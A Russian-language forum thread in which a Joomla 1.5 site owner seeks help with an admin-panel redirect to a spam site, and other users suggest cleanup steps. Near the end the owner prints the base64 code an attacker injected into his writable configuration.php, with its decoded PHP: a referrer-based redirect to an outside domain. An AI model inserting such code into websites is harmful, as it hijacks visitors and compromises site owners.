Взлом Joomla 1.5 (Хелп!) - Безопасность сайтов на Joomla

Вот у меня такая беда. Захожу я в админ панель, жму например на "Менеджер модулей" а меня кидает на левый сайт сайт (http://finditnow. osa.pl/atp/?said=3333&q=facebook). <<--- Вот на этот сайт
у кого такое было ? что делать ? как с этим бороться ?

Обновление с 1.5.14 до 1.5.22 не помогло !
че блин делать то ? какого меня кидает на этот дибильный сайт ?
на сайте кроме JoomGallery 1.5.6.2 stable, easygb_2.0 и jcomments_v2.2 больше ничего не стоит.
Народ ! Хелп !

тщательно проверяйте рабочий компьютер на вирусы
восстанавливайтесь из бекапа

Попросите хостера восстановить сайт на более ранее число, поменяйте все пароли

А сам сайт почистили?
Проблема только в админке?

Проблема только в админке, файлы откатывал не помогло.
Вирусы мне кажется здесь ни причем. Я эту штуку заметил у знакомого дома у него там недавно была винда установлена.Хотя может и я ее туда занес придется винду сносить и попробую опять обновить файлы.
Если это не вирус то как эта зараза туда ваще попала!?. У меня 777 на папках только стоит. на файлах 644. ХЗ что делать ! У вас такого не было ?

А сам сайт почистили?
Проблема только в админке?

Каким макаром его можно почистить ?

Каким макаром его можно почистить ?

для начала скопировать его к себе на жесткий и пройтись Касперским...

А смысл откатов и обновлений? Дата появления редиректа неизвестна, так что смысла никакого. Только смотреть и чистить.
Кажется - крестится надо, а это похоже на редирект, сам он появиться не мог.

смотрим сюда так на всякий случай htaccess
и перезалеваем сверху 1.5.22 прямо сверху все файлы и не паримся

flyingspook, паримся, но чуть позже, даже перезаливка может не помочь, нужно смотреть что к чему.

стражник такого не может быть весь редирект в файлах,
его не бывает из воздуха
а что ТС пишет это воздух просто
обновление это не выход надо все файлы менять брать 1.5.22 и заливать полностью сверху
меньше времени и результат, а искать в 3тыс. файлах   
если заливать а на папках права не открыты конечно старые файлы останутся с редиректом
его хаки в основном в плагины и админ папки пишут
а смотреть нужно может кто что в БД отправил но что описано это просто в файле залито
видел не раз такое

Я про то, что дыра может быть в не дефолтном модуле или плагине, потому и смотреть надо, т.к. обновление в этом случае не спасет, даже полная перезаливка не спасет, временная мера получается. Вопрос в том, откуда ТС брал расширения.

Мужики !
1. Всех с праздником !
2. Я снесу Винду потом попробую поставить Жумку. если все траблы пропадут значит это был вирус с моего ПК
3. Также я уже сделал демо сайтец (Без ничего) если туда попадет эта зараза то будем чет думать.
4.Что я думаю по этому поваду.я думаю что мог залезть вирус с моего ПК... ну а дальше думайте сами =)! Если найду решение то напишу !

1. С праздником.
2. Ставить нужно антивирус или хоть утилитами от Д,Вэба проверить и Касперского.
3. Думать надо сейчас, а не надеяться на авось.
4. Мог, но решение вам уже написали.

после запоя в честь 23го февраля я нашел проблему =)
Никто из вас не был прав !
Проблема была в том, что я забыл выставить нормальные права на файл конфиг.пхп (просто забыл поменять права на него)
Мне туда и втулили редирект =)  ! никакие это не вирусы и в помине их там не может быть.
мне вот и вставили в первую строку код:
"ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VS
VkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJl
ciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3R
yKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYXNrIikgb3Igc3RyaXN0cigkcmVmZXJlciwieW91dHViZSIpIG9
yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rIikgKSB7DQoJaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJzaXRlIikgb3IgIXN0cmlz
dHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh
0dHA6Ly9iYnBsaW9wcy4zNDUucGwvIik7DQoJCWV4aXQoKTsNCgl9DQp9DQoJfQ=="   
А вот если декодировать то будет:
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"msn") or stristr($referer,"bing") or stristr($referer,"ask") or stristr($referer,"youtube") or stristr($referer,"facebook") ) {
    if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){       
        header("Location: http://bbpliops.345.pl/");
        exit();
    }
}
    }
вот так то =)

Никто из вас не был прав !

Про чистку в теме сколько раз писали? Проверять нужно всё, а не надеяться на готовые ответы.